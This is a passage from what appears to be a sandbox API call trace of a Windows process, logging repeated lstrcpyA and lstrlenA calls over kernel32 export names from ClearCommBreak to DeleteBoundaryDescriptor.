(lpString="CLEARCOMMBREAK") returned 14 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.744] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.744] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.744] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.744] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.745] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.745] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.745] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.745] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.745] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.745] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.745] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.745] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.745] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.745] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.745] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.745] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.745] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.745] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.745] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.746] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.746] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.746] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.746] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.746] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.746] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.746] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.746] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.746] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.746] lstrlenA (lpString="COPYFILEA") returned 9 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.746] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.746] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.746] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.746] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.746] lstrlenA (lpString="COPYFILEW") returned 9 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.746] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.746] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.746] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.746] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.747] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.747] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.747] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.747] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.747] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.747] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.747] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.747] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.747] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.747] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.747] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.747] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.747] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.747] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.747] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.747] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.747] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.747] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.747] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.747] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.748] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.748] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.748] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.748] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.748] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.748] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.748] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.748] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.748] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.748] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.748] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.748] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.748] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.748] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.748] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.748] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.748] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.748] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.748] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.748] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.748] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.749] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.749] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.749] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.749] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.749] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.749] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.749] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.749] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.749] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.749] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.749] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.749] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.749] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.749] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.749] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.749] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.749] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.749] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.749] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.749] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.750] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.750] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.750] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.750] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.750] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.750] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.750] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.750] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.750] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.750] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.750] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.750] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.750] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.750] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.750] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.750] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.750] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.750] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.750] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.750] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.751] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.751] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.751] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.751] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.751] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.751] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.751] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.751] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.751] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.751] lstrlenA (lpString="DELETEATOM") returned 10 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.751] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 